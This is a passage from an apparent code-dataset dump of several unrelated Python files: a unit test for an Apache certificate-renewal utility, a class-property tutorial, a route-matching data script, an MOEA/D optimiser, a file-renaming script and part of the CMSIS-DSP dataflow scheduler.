'Apache certificate renewal',\n 'EmailSubjectPostfix': None})\n\n settings_dict = util.populate_defaults(\n {'EmailNotifications': True, 'EmailSubject': 'Some 
subject'}, known_settings)\n self.assertEquals(settings_dict, {'VHost': None,\n 'ServerName': None,\n 'EmailNotifications': True,\n 'EmailSubject': 'Some subject',\n 'EmailSubjectPostfix': 'some_postfix'})\n\n def test_validate_setting_dependencies(self):\n # given\n known_settings = {'Required': {'required': True,\n 'dependencies': []},\n\n 'Optional': {'required': False,\n 'dependencies': []},\n\n 'RequiredWithDependency': {'required': True,\n 'dependencies': ['Optional']},\n\n 'OptionalWithDependency': {'required': False,\n 'dependencies': ['Optional']}}\n # whens/thens\n errors = util.validate_setting_dependencies(\n {\n 'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4'},\n known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies({'Required': 'value'}, known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3'}, known_settings)\n self.assertEqual(errors, [])\n\n errors = util.validate_setting_dependencies({}, known_settings)\n self.assertEqual(errors, ['Required setting \"Required\" not found.'])\n\n errors = util.validate_setting_dependencies(\n {'Required': 'value', 'Optional': 'value2'}, known_settings)\n self.assertEqual(\n errors,\n ['The current configuration requires setting \"RequiredWithDependency\".'])\n\n def test_parse_settings(self):\n known_settings = {\n 'Required': {\n 'required': True,\n 'dependencies': [],\n 'default_value': 'not_used_since_required'},\n 'Optional': {\n 'required': False,\n 'dependencies': [],\n 'default_value': 'optional_default'},\n 'RequiredWithDependency': {\n 'required': True,\n 'dependencies': ['Optional'],\n 'default_value': 'not_used_since_required'},\n 'OptionalWithDependency': {\n 'required': False,\n 'dependencies': ['Optional']},\n 'OptionalWithDependency2': {\n 'required': False,\n 
'dependencies': ['OptionalWithDependency'],\n 'default_value': 'optional_with_dependency_2_default'}}\n\n # whens/thens\n settings, errors = util.parse_settings({'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4', 'OptionalWithDependency2': 'value5'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4',\n 'OptionalWithDependency2': 'value5'})\n\n settings, errors = util.parse_settings({'Required': 'value'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'optional_default',\n 'RequiredWithDependency': None,\n 'OptionalWithDependency': None,\n 'OptionalWithDependency2': None})\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings, {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': None,\n 'OptionalWithDependency2': None})\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3', 'OptionalWithDependency': 'value4'}, known_settings)\n self.assertEqual(errors, [])\n self.assertEquals(settings,\n {'Required': 'value',\n 'Optional': 'value2',\n 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4',\n 'OptionalWithDependency2': 'optional_with_dependency_2_default'})\n\n settings, errors = util.parse_settings({}, known_settings)\n self.assertEqual(errors, ['Required setting \"Required\" not found.'])\n self.assertEquals(settings, None)\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2'}, known_settings)\n self.assertEqual(\n errors,\n ['The current configuration requires 
setting \"RequiredWithDependency\".'])\n self.assertEquals(settings, None)\n\n settings, errors = util.parse_settings(\n {'Required': 'value', 'Optional': 'value2', 'RequiredWithDependency': 'value3',\n 'OptionalWithDependency': 'value4', 'OptionalWithDependency2': 'value5', 'UnknownSetting': 'value6'}, known_settings)\n self.assertEqual(len(errors), 1)\n self.assertRegexpMatches(errors[0], 'Unknown setting \"UnknownSetting\" encountered')\n self.assertEquals(settings, None)\n\n def test_email(self):\n # given\n mailbox_dir = '/var/mail'\n random_string = str(uuid.uuid4())\n subject = 'Test Mail ' + random_string\n msg_body = 'Message body: ' + random_string\n attachments = [('attachment1-name-' + random_string, 'attachment1-body'),\n ('attachment2-name-' + random_string, 'attachment2-body')]\n # when\n util.send_email(\n smtp_server_addr='localhost',\n sender='root@localhost',\n recipients=['root@localhost'],\n subject=subject,\n message=msg_body,\n attachments=attachments)\n\n # then\n time.sleep(2)\n self.assertTrue(os.listdir(mailbox_dir))\n mailbox_file_name = util.run_cmd('ls -Art /var/mail| tail -n 1')\n mail_file = mailbox_dir + '/' + mailbox_file_name\n mails = open(mail_file).read()\n\n self.assertTrue('From: root@localhost' in mails)\n self.assertTrue('To: root@localhost' in mails)\n self.assertTrue('Subject: ' + subject in mails)\n self.assertTrue(msg_body in mails)\n self.assertTrue('filename=\\\\\"{}\\\\\"\";'.format(attachments[0][0]) in mails)\n self.assertTrue('filename=\\\\\"{}\\\\\"\";'.format(attachments[1][0]) in mails)\n\n def test_is_backup_file_path(self):\n self.assertFalse(util.is_backup_file_path('/home/me/some-file_path'))\n self.assertFalse(util.is_backup_file_path('some-file_path'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig.'))\n self.assertFalse(util.is_backup_file_path('some-file_path.orig.something-something'))\n 
self.assertTrue(util.is_backup_file_path('some-file_path.orig.1-2'))\n self.assertTrue(util.is_backup_file_path('some-file_path.orig.0000-0000'))\n self.assertTrue(util.is_backup_file_path('some-file_path.orig.20150928-140919'))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"Software/Client/TestProjects/testReseptInstaller/linux/apache/util_test.py","file_name":"util_test.py","file_ext":"py","file_size_in_byte":14533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"423937266","text":"class Person:\n def __init__(self, firstname, lastname):\n self.firstname = firstname\n self.lastname = lastname\n\n @property\n def fullname(self):\n return self.firstname + \" \" + self.lastname\n\n @fullname.setter\n def fullname(self, value):\n self.firstname, self.lastname = value.split(\" \", 1)\n\n @fullname.deleter\n def fullname(self):\n self.firstname = \"\"\n self.lastname = \"\"\n\nprint(\"*** Person Class instance initiated using var: A ***\")\nA = Person(\"Ravi\", \"Raja\")\nprint(\"What is A:\", A)\n\nprint(A.firstname)\nprint(A.lastname)\nprint(A.fullname)\n\nprint(\"Updating first & lastname\")\nA.firstname = \"Ravi Raja\"\nA.lastname = \"Koineni\"\n\nprint(A.fullname)\nA.fullname = \"Ravi Raja K\"\nprint(A.fullname)\ndel A.fullname\nprint(\"Called deleter fullname:\", A.fullname)\nprint(\"=====END=======\")\n\n# In Python, prefixing a member variable by a single underscore signals the variable is non-public,\n# i.e. 
it should only be accessed internally, inside methods of that class, or its subclasses.[1]\n# What this pattern says is \"you can access this variable, but not change it\".\n\nclass Ticket:\n def __init__(self, price): #### Default Constructor\n if price < 0:\n raise ValueError(\"Use Valid Positive Value to Price\", price)\n self.price = price\n\n @property\n def price(self):\n return self._price ### prefixing a member variable by a single underscore signals the variable is non-public\n\n @price.setter\n def price(self, price):\n # Only allow positive prices.\n print(\"new_price is\", price)\n if price < 0:\n raise ValueError(\"Use Valid Positive Value to Price\", price)\n self._price = price\n\n def update_price(self, new_price):\n # Only allow positive prices.\n print(\"Price Changed: -> \", new_price)\n if new_price < 0:\n raise ValueError(\"Use Valid Positive Value to Price\", new_price)\n self._price = new_price\n\n\nt = Ticket(30)\nprint(\"Property of Ticket Class\", t.price)\nprint(\"Instance attribute of t\", t._price)\n\nt1 = Ticket(24)\nprint(\"t1 price:\",t1.price)\n\nprint(\"========\")\nt1.update_price(26)\nprint(\"New Price:\", t1.price)\n\nprint(callable(t1.price))\nprint(callable(t1.update_price))","sub_path":"ClassesWork.py","file_name":"ClassesWork.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"281964187","text":"import pandas as pd\nfrom shapely.geometry import Point\nimport numpy as np\nimport math\n\ndef toCartesian(latitude, longitude):\n x = longitude * 70_800\n y = latitude * 111_300\n return Point(x, y)\n\noperace = pd.read_csv(\"data/operaceDEV01_corr.csv\")\npresuny = pd.read_csv(\"data/routes_01.csv\")\npolohy = pd.read_csv(\"data/onesec_all_01.csv\")\n\n\ndef poloha(time):\n near_index = polohy['beat'].sub(time).abs().idxmin()\n return toCartesian(polohy.iloc[near_index][\"locLat\"], polohy.iloc[near_index][\"locLon\"])\n\nj = 0\njizda 
= np.full(len(operace), math.nan)\nprev_vykladka = np.full(len(operace), math.nan)\nnext_nakladka = np.full(len(operace), math.nan)\nprev_nakladka = np.full(len(operace), math.nan)\nnext_vykladka = np.full(len(operace), math.nan)\nd_next_nakladka = np.full(len(operace), math.nan)\nd_prev_nakladka = np.full(len(operace), math.nan)\n\nfor i in range(len(operace)):\n otime = int(operace.iloc[i][\"cas_real\"] / 1_000 + 0.5)\n opoloha = poloha(otime)\n while True:\n if j == len(presuny):\n break\n if j == 0:\n t0 = presuny.iloc[0][\"beat\"] - 120\n else:\n t0 = presuny.iloc[j-1][\"end_beat\"]\n poloha0 = poloha(t0)\n t1 = presuny.iloc[j][\"beat\"]\n poloha1 = poloha(t1)\n t2 = presuny.iloc[j][\"end_beat\"]\n poloha2 = poloha(t2)\n if t0 <= otime <= t1:\n if t1-otime < 300:\n jizda[i] = j\n prev_vykladka[i] = t0 - otime\n next_nakladka[i] = t1 - otime\n d_next_nakladka[i] = opoloha.distance(poloha1)\n print(f\"OK: {otime-t0} - {t1-otime} [{opoloha.distance(poloha1)}] {i}/{j}\")\n break\n if t1 <= otime <= t2:\n if t2-otime < 300:\n jizda[i] = j\n prev_nakladka[i] = t1 - otime\n next_vykladka[i] = t2 - otime\n d_prev_nakladka[i] = opoloha.distance(poloha1)\n print(f\"--- {otime-t1} [{opoloha.distance(poloha1)}] - {t2-otime} [{opoloha.distance(poloha2)}] {i}/{j}\")\n break\n j += 1\noperace[\"jizda\"] = jizda\noperace[\"prev_vykladka_dt\"] = prev_vykladka\noperace[\"next_nakladka_dt\"] = next_nakladka\noperace[\"prev_nakladka_dt\"] = prev_nakladka\noperace[\"next_vykladka_dt\"] = next_vykladka\noperace[\"next_nakladka_vzdalenost\"] = d_next_nakladka\noperace[\"prev_nakladka_vzdalenost\"] = d_prev_nakladka\noperace.to_csv(\"data/operaceDEV01_s_jizdami.csv\")","sub_path":"event_binder.py","file_name":"event_binder.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197761145","text":"#!/usr/bin/env python3#########################################################\n# -*- coding: 
utf-8 -*-########################################################\n# File : moead_continuous.py\n# Author : tainzhi\n# Mail : qfq61@qq.com\n# Created : 2017-05-22 16:01:46\n# Modified : 2017-06-28 21:55:40\n# Description :\n# #############################################################################/\n\nimport random\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport problem\nimport algorithm\nfrom individual import *\nfrom population import Population\n\n\nclass MOEAD(algorithm.Algorithm):\n\n description = \"MOEAD\"\n\n def __init__(self, prob,\n generation=100,\n neighbour_size=20,\n crossover_probability=0.9,\n mutate_probability=0.1,\n approach=0):\n\n self.prob = prob\n self.population_size = self.prob.population_size\n self.neighbour_size = neighbour_size\n self.generation = generation\n self.crossover_probability = crossover_probability\n self.approach = approach # 0 weighted sum decomposition approach\n # 1 tchebycheff decomposition approach\n # 2 normalized tchebycheff approach\n # 3 boundary intersection approach\n self.weight_vector_seed = self.prob.weight_vector_seed\n self.lambda_ = np.zeros((prob.objecti_size, self.population_size))\n self.population = Population(prob, self.population_size)\n self.neighbour = np.zeros(\n (neighbour_size, self.population_size), dtype=int)\n\n def init_weight_vector(self):\n if self.prob.objecti_size == 2:\n cnt = 0\n for i in range(self.weight_vector_seed + 1):\n a = 1.0 * i / self.weight_vector_seed\n self.lambda_[:, cnt] = np.array((a, 1 - a))\n cnt += 1\n elif self.prob.objecti_size == 3:\n cnt = 0\n for i in range(self.weight_vector_seed + 1):\n for j in range(self.weight_vector_seed + 1 - i):\n self.lambda_[\n :,\n cnt] = np.array(\n (i / self.weight_vector_seed,\n j / self.weight_vector_seed,\n (self.weight_vector_seed - i - j) / self.weight_vector_seed))\n cnt += 1\n\n def init_neighbour(self):\n for i in range(self.population_size):\n dist = [0.0 for j in 
range(self.population_size)]\n index = [j for j in range(self.population_size)]\n for j in range(self.population_size):\n dist[j] = np.linalg.norm(\n self.lambda_[:, i] - self.lambda_[:, j])\n dist, index = list(zip(*sorted(zip(dist, index))))\n # print(list(zip(dist, index))[0:3])\n self.neighbour[:, i] = np.array(index[0:self.neighbour_size])\n\n def scalar_function(self, individual, lambda_):\n \"\"\"\n individual: type Individual\n lambda_: type numpy.ndarray(2,1)\n \"\"\"\n for i in range(self.prob.objecti_size):\n if lambda_[i] == 0:\n lambda_[i] = 0.0001\n if self.approach == 0:\n # weighted sum approach\n return np.dot(individual.objecti, lambda_)\n elif self.approach == 1:\n # tchebycheff approach\n return np.max(\n lambda_ *\n np.fabs(\n individual.objecti -\n self.population.reference_objecti))\n elif self.approach == 2:\n # normalized tchebycheff approach\n return np.max(lambda_ * np.fabs((individual.objecti - self.population.reference_objecti) / (self.population.max_objecti - self.population.reference_objecti)))\n else:\n # penalty-based boundary intersection approach: approach index is 3\n f = np.array((individual.objecti))\n z = np.array((self.population.reference_objecti))\n d1 = np.dot(f - z, lambda_) / np.linalg.norm(lambda_)\n d2 = np.linalg.norm(f - (z + d1 * lambda_))\n return d1 + 10 * d2\n\n def update_neighbour(self, individual_index, individual):\n for i in range(self.neighbour_size):\n k = self.neighbour[i, individual_index]\n f1 = self.scalar_function(\n self.population.individuals[k],\n self.lambda_[\n :,\n k])\n f2 = self.scalar_function(individual, self.lambda_[:, k])\n if f2 < f1:\n self.population.individuals[k] = individual\n\n def evolution(self):\n generation = 0\n self.population.update_reference()\n self.init_weight_vector()\n self.init_neighbour()\n while generation < self.generation:\n print((\"MOEA/D generation=%d\" % generation))\n for i in range(self.population_size):\n parent = np.random.choice(\n self.neighbour[:, i], 2, 
replace=False)\n # print(self.neighbour[:,i])\n child = self.de_crossover(self.population.individuals[i],\n self.population.individuals[parent[0]],\n self.population.individuals[parent[1]])\n self.polynomial_mutate(child)\n self.population.update_reference(child)\n # print(self.population.reference_objecti)\n self.update_neighbour(i, child)\n generation += 1\n self.save_result()\n\n\ndef main():\n prob = problem.DTLZ1()\n # prob.plot_pareto_front()\n alo = MOEAD(prob, approach=1, generation=100)\n alo.evolution()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MOEA_continuous/moead.py","file_name":"moead.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57319526","text":"import os \n\nsearch = 'document'\nreplace = 'file'\nfiletype = '.docx'\nrenamed = 0 \n\ndir_content = os.listdir('.')\ndocs=[doc for doc in dir_content if os.path.isfile(doc)]\n\nprint(f\"{len(docs)} of {len(dir_content)} elements are files \")\n\nfor doc in docs :\n\n filename, fileformat = os.path.splitext(doc)\n\n if fileformat == filetype:\n\n if search in filename:\n \n new_name = filename.replace(search,replace)+filetype\n os.rename(doc,new_name) \n renamed += 1\n print(f\"Renamed {renamed}: {doc} ----> {new_name}\\n\")\n\n","sub_path":"simple bots/py/renaming-self.py","file_name":"renaming-self.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645503365","text":"###########################################\n# Project: CMSIS DSP Library\n# Title: description.py\n# Description: Schedule generation\n# \n# $Date: 29 July 2021\n# $Revision: V1.10.0\n# \n# Target Processor: Cortex-M and Cortex-A cores\n# -------------------------------------------------------------------- */\n# \n# Copyright (C) 2010-2021 ARM Limited or its affiliates. 
All rights reserved.\n# \n# SPDX-License-Identifier: Apache-2.0\n# \n# Licensed under the Apache License, Version 2.0 (the License); you may\n# not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an AS IS BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n############################################\n\"\"\"Description of the graph\"\"\"\n\nimport networkx as nx\nimport numpy as np \nfrom sympy import Matrix\nfrom sympy.core.numbers import ilcm,igcd\n\nimport cmsisdsp.sdf.scheduler.graphviz\nimport cmsisdsp.sdf.scheduler.ccode\nimport cmsisdsp.sdf.scheduler.pythoncode\n\nfrom .node import *\nfrom .config import *\nfrom ..types import *\n\n# To debug graph coloring for memory optimization\n#import matplotlib.pyplot as plt\n\nclass IncompatibleIO(Exception):\n pass\n\nclass GraphIsNotConnected(Exception):\n pass\n\nclass NotSchedulableError(Exception):\n pass\n\nclass DeadlockError(Exception):\n pass\n\nclass CannotDelayConstantError(Exception):\n pass\n\nclass FifoBuffer:\n \"\"\"Buffer used by a FIFO\"\"\"\n def __init__(self,bufferID,theType,length):\n self._length=length \n self._theType=theType \n self._bufferID=bufferID\n\nclass FIFODesc:\n \"\"\"A FIFO connecting two nodes\"\"\"\n def __init__(self,fifoid):\n # The FIFO is in fact just an array\n self.isArray=False \n # FIFO length\n self.length=0\n # FIFO type\n self.theType=None \n # Buffer used by FIFO\n self.buffer=None \n # Used for plot in graphviz\n self.bufferID=-1\n self._fifoID=fifoid \n # Source IO\n self.src = None \n # Dest IO\n self.dst = None \n # FIFO delay\n self.delay=0\n\n # Used for liveliness analysis\n # To share buffers between FIFO in 
memory optimization\n # mode, we need to know when a FIFO is in use.\n # We compute the maximum extent : so the biggest interval\n # and not a disconnected union of intervals\n # This could be improved. We could use\n # a disjoint union of intervals but they should be mapped\n # to the same node in the interference graph\n self._liveInterval=(-1,-1)\n\n # shared buffer number not yet allocated\n self.sharedNB=-1\n\n # For c code generation \n @property\n def isArrayAsInt(self):\n if self.isArray:\n return(1)\n else:\n return(0)\n\n @property\n def hasDelay(self):\n return(self.delay>0)\n\n def dump(self):\n \n print(\"array %d len %d %s id %d src %s:%s dst %s:%s \" % \n (self.isArray,\n self.length,\n self.theType.ctype,\n self.fifoID,\n self.src.owner.nodeID,\n self.src.name,\n self.dst.owner.nodeID,\n self.dst.name))\n\n @property\n def fifoID(self):\n return self._fifoID\n \n def recordWrite(self,theTime):\n start,stop=self._liveInterval \n if start==-1:\n self._liveInterval=(theTime,stop)\n\n def recordRead(self,theTime):\n start,stop=self._liveInterval \n if (theTime > stop):\n self._liveInterval=(start,theTime)\n\n\ndef analyzeStep(vec,allFIFOs,theTime):\n \"\"\"Analyze an evolution step to know which FIFOs are read and written to\"\"\"\n fifoID = 0 \n for fifo in (vec > 0):\n if fifo:\n allFIFOs[fifoID].recordWrite(theTime) \n fifoID = fifoID + 1\n\n fifoID = 0 \n for fifo in (vec < 0):\n if fifo:\n allFIFOs[fifoID].recordRead(theTime) \n fifoID = fifoID + 1\n\nclass Graph():\n\n def __init__(self):\n self._nodes={}\n self._edges={}\n self._delays={}\n self._constantEdges={}\n self._g = nx.Graph()\n self._sortedNodes=None\n self._totalMemory=0\n self._allFIFOs = None \n self._allBuffers = None\n\n def connect(self,nodea,nodeb):\n # When connecting to a constant node we do nothing\n # since there is no FIFO in this case\n # and it does not participate to the scheduling.\n if (isinstance(nodea,Constant)):\n nodeb.constantNode = nodea\n 
self._constantEdges[(nodea,nodeb)]=True\n else:\n if nodea.compatible(nodeb):\n self._sortedNodes = None\n self._sortedEdges = None\n self._g.add_edge(nodea.owner,nodeb.owner)\n \n nodea.fifo = (nodea,nodeb) \n nodeb.fifo = (nodea,nodeb)\n self._edges[(nodea,nodeb)]=True\n if not (nodea.owner in self._nodes):\n self._nodes[nodea.owner]=True\n if not (nodeb.owner in self._nodes):\n self._nodes[nodeb.owner]=True\n else:\n raise IncompatibleIO\n\n def connectWithDelay(self,nodea,nodeb,delay):\n # We cannot connect with delay to a constant node\n if (isinstance(nodea,Constant)):\n raise CannotDelayConstantError\n else:\n self.connect(nodea,nodeb)\n self._delays[(nodea,nodeb)] = delay\n \n def __str__(self):\n res=\"\"\n for (a,b) in self._edges: \n nodea = a.owner\n nodeb = b.owner \n\n res += (\"%s.%s -> %s.%s\\n\" % (nodea.nodeID,a.name, nodeb.nodeID,b.name))\n\n return(res)\n\n def initializeFIFODescriptions(self,config,allFIFOs, fifoLengths,maxTime):\n \"\"\"Initialize FIFOs datastructure\"\"\" \n for fifo in allFIFOs:\n edge = self._sortedEdges[fifo.fifoID]\n fifo.length = fifoLengths[fifo.fifoID]\n src,dst = edge\n fifo.src=src\n fifo.dst=dst \n fifo.delay=self.getDelay(edge)\n # When a FIFO is working as an array then its buffer may\n # potentially be shared with other FIFOs workign as arrays\n if src.nbSamples == dst.nbSamples:\n if fifo.delay==0:\n fifo.isArray = True \n fifo.theType = src.theType\n #fifo.dump()\n\n\n bufferID=0\n allBuffers=[]\n\n # Compute a graph describing when FIFOs are used at the same time\n # The use graph coloring to allocate buffer to those FIFOs.\n # Then size the buffer based on the longest FIFO using it\n if config.memoryOptimization:\n G = nx.Graph()\n\n for fifo in allFIFOs: \n if fifo.isArray:\n G.add_node(fifo)\n\n # Create the interference graph\n\n # Dictionary of active FIFOs at a given time.\n # The time is a scheduling step\n active={}\n currentTime=0\n while currentTime<=maxTime:\n # Remove fifo no more active.\n # Thei 
stop time < currenTime\n toDelete=[]\n for k in active:\n start,stop=k._liveInterval \n if stop node -> dst\n # At time t, node will read for src and the stop time\n # will be currentTime t.\n # And it will write to dst and the start time will be\n # currentTime\n # So, src and dst are both live at this time.\n # Which means the condition on the stop time must be \n # stop >= currentTime and not a strict comparison\n if start<=currentTime and stop >= currentTime:\n if not (fifo in active):\n for k in active:\n G.add_edge(k,fifo)\n active[fifo]=True \n \n currentTime = currentTime + 1\n\n # To debug and display the graph\n if False:\n labels={}\n for n in G.nodes:\n labels[n]=\"%s -> %s\" % (n.src.owner.nodeName,n.dst.owner.nodeName)\n \n pos = nx.spring_layout(G, seed=3113794652)\n subax1 = plt.subplot(121)\n nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)\n \n nx.draw_networkx_labels(G, pos, labels, font_size=10)\n plt.show()\n quit()\n\n \n # Graph coloring\n d = nx.coloring.greedy_color(G, strategy=\"largest_first\")\n\n # Allocate the colors (buffer ID) to the FIFO\n # and keep track of the max color number\n # Since other buffers (for real FIFOs) will have their\n # numbering start after this one.\n for fifo in d:\n fifo.sharedNB=d[fifo]\n bufferID=max(bufferID,fifo.sharedNB)\n\n\n\n # Compute the max size for each shared buffer\n maxSizes={} \n for fifo in d:\n lengthInBytes = fifo.theType.bytes * fifo.length\n if fifo.sharedNB in maxSizes:\n maxSizes[fifo.sharedNB] = max(maxSizes[fifo.sharedNB],lengthInBytes) \n else:\n maxSizes[fifo.sharedNB]=lengthInBytes\n\n # Create the buffers\n for theID in maxSizes:\n sharedA = FifoBuffer(theID,CType(UINT8),maxSizes[theID])\n allBuffers.append(sharedA)\n\n for fifo in allFIFOs:\n # Use shared buffer if memory optimization\n if fifo.isArray and config.memoryOptimization:\n fifo.buffer=allBuffers[fifo.sharedNB] \n fifo.bufferID=fifo.sharedNB\n # Create a new buffer for a real FIFO\n # Use bufferID which is starting 
after the numbers allocated\n # to shared buffers\n else:\n buf = FifoBuffer(bufferID,fifo.theType,fifo.length)\n allBuffers.append(buf)\n fifo.buffer=buf\n fifo.bufferID = bufferID\n bufferID = bufferID + 1\n\n # Compute the total memory used in bytes\n self._totalMemory = 0\n for buf in allBuffers:\n self._totalMemory = self._totalMemory + buf._theType.bytes * buf._length\n\n #for fifo in allFIFOs:\n # fifo.dump()\n return(allBuffers)\n\n\n\n\n @property\n def constantEdges(self):\n return list(self._constantEdges.keys())\n \n @property\n def nodes(self):\n return list(self._nodes.keys())\n\n @property\n def edges(self):\n return list(self._edges.keys())\n \n\n def hasDelay(self,edge):\n return(edge in self._delays)\n\n def getDelay(self,edge):\n if self.hasDelay(edge):\n return(self._delays[edge])\n else:\n return(0)\n\n def checkGraph(self):\n if not nx.is_connected(self._g):\n raise GraphIsNotConnected\n\n def topologyMatrix(self):\n self.checkGraph()\n rows=[]\n # This is used in schedule generation\n # and all functions must use the same node ordering\n self._sortedNodes = sorted(self.nodes, key=lambda x: x.nodeID)\n # Arbitrary order but used for now\n self._sortedEdges = self.edges.copy()\n #for x in self._sorted:\n # print(x.nodeID)\n\n for edge in self._sortedEdges: \n na,nb = edge\n currentRow=[0] * len(self._sortedNodes) \n\n ia=self._sortedNodes.index(na.owner)\n ib=self._sortedNodes.index(nb.owner)\n\n # Produced by na on the edge\n currentRow[ia] = na.nbSamples\n\n # Consumed by nb on the edge\n currentRow[ib] = -nb.nbSamples\n\n rows.append(currentRow)\n\n return(np.array(rows))\n\n def nullVector(self):\n m = self.topologyMatrix()\n r=Matrix(m).nullspace()\n if len(r) != 1:\n raise NotSchedulableError\n result=list(r[0])\n denominators = [x.q for x in result]\n # Remove denominators\n ppcm = ilcm(*denominators)\n #print(ppcm)\n intValues = [x * ppcm for x in result]\n # Convert intValues to the smallest possible values\n gcd = igcd(*intValues)\n 
return([x / gcd for x in intValues])\n\n @property\n def initEvolutionVector(self):\n \"\"\"Initial FIFO state taking into account delays\"\"\"\n return(np.array([self.getDelay(x) for x in self.edges]))\n\n def evolutionVectorForNode(self,nodeID):\n \"\"\"Return the evolution vector corresponding to a selected node\"\"\"\n v = np.zeros(len(self._sortedNodes))\n v[nodeID] = 1 \n return(v)\n\n def computeSchedule(self,config=Configuration()):\n # Init values\n initB = self.initEvolutionVector\n initN = self.nullVector()\n\n # Current values (copys)\n b = np.array(initB)\n n = np.array(initN)\n\n if config.displayFIFOSizes:\n for edge in self._sortedEdges:\n print(\"%s:%s -> %s:%s\" % (edge[0].owner.nodeID,edge[0].name,edge[1].owner.nodeID,edge[1].name))\n print(b)\n\n # Topology matrix\n t = np.array(self.topologyMatrix())\n\n # Define the list of FIFOs objects\n nbFIFOS = t.shape[0]\n allFIFOs = [] \n for i in range(nbFIFOS):\n allFIFOs.append(FIFODesc(i))\n\n # Normalization vector\n normV = 1.0*np.apply_along_axis(abs,1,t).max(axis=1)\n\n # bMax below is used to track maximum FIFO size \n # occuring during a run of the schedule\n #\n # The heuristric is:\n #\n # First we compute on each edge the maximum absolute value\n # It is the minimum amount of data an edge must contain\n # for the system to work either because it is produced\n # by a node or consumed by another.\n # We use this value as an unit of measurement for the edge.\n # So, we normalize the FIFO lengths by this size.\n # If this occupancy number is > 1 then it means\n # that enough data is available on the FIFO for the\n # consumer to consume it.\n # When we select a node for scheduling later we try\n # to minimize the occupancy number of all FIFOs by\n # selecting the schedulign which is giving the\n # minimum maximum occupancy number after the run.\n bMax = 1.0*np.array(initB) / normV\n\n\n schedule=[]\n\n zeroVec = np.zeros(len(self._sortedNodes))\n evolutionTime = 0\n # While there are remaining 
nodes to schedule\n while (n != zeroVec).any():\n # Look for the best mode to schedule\n # which is the one giving the minimum FIFO increase\n \n # None selected\n selected = -1\n\n # Min FIFO size found\n minVal = 10000000\n nodeID = 0\n for node in self._sortedNodes:\n # If the node can be scheduled\n if n[nodeID] > 0:\n # Evolution vector if this node is selected\n v = self.evolutionVectorForNode(nodeID)\n # New fifos size after this evolution\n newB = np.dot(t,v) + b\n\n # Check that there is no FIFO underflow:\n if np.all(newB >= 0):\n # Total FIFO size for this possible execution\n # We normalize to get the occupancy number as explained above\n theMin = (1.0*np.array(newB) / normV).max()\n # If this possible evolution is giving smaller FIFO size\n # (measured in occupancy number) then it is selected\n if theMin <= minVal:\n minVal = theMin\n selected = nodeID \n\n nodeID = nodeID + 1\n\n # No node could be scheduled because of not enough data\n # in the FIFOs. It should not occur if there is a null\n # space of dimension 1. 
So, it is probably a bug if\n # this exception is raised\n if selected < 0:\n raise DeadlockError\n # Now we have evaluated all schedulable nodes for this run\n # and selected the one giving the smallest FIFO increase\n\n # Real evolution vector for selected node\n evol = self.evolutionVectorForNode(selected)\n # Keep track that this node has been schedule\n n = n - evol\n # Compute new fifo state\n fifoChange = np.dot(t,evol)\n b = fifoChange + b\n\n if config.displayFIFOSizes:\n print(b)\n \n bMax = np.maximum(b,bMax)\n schedule.append(selected)\n\n # Analyze FIFOs to know if a FIFOs write is\n # followed immediately by a FIFO read of same size\n analyzeStep(fifoChange,allFIFOs,evolutionTime)\n evolutionTime = evolutionTime + 1\n\n fifoMax=np.floor(bMax).astype(np.int32)\n \n allBuffers=self.initializeFIFODescriptions(config,allFIFOs,fifoMax,evolutionTime)\n self._allFIFOs = allFIFOs \n self._allBuffers = allBuffers\n return(Schedule(self,self._sortedNodes,self._sortedEdges,schedule))\n\n\nclass Schedule:\n def __init__(self,g,sortedNodes,sortedEdges,schedule):\n self._sortedNodes=sortedNodes\n self._sortedEdges=sortedEdges\n self._schedule = schedule \n self._graph = g\n # Nodes containing pure functions (no state) like some\n # CMSIS-DSP functions.\n # When scheduling is using the option codeArray, the\n # schedule is encoded as an array.\n # Function calls cannot be inlined anymore and we need\n # to create new nodes for those function calls.\n # The pureNode structure is done for this.\n # It is a record because we want to reuse nodes for same\n # types.\n self._pureNodes={}\n nodeCodeID = 0\n pureClassID = 1\n for n in self.nodes:\n n.codeID = nodeCodeID\n nodeCodeID 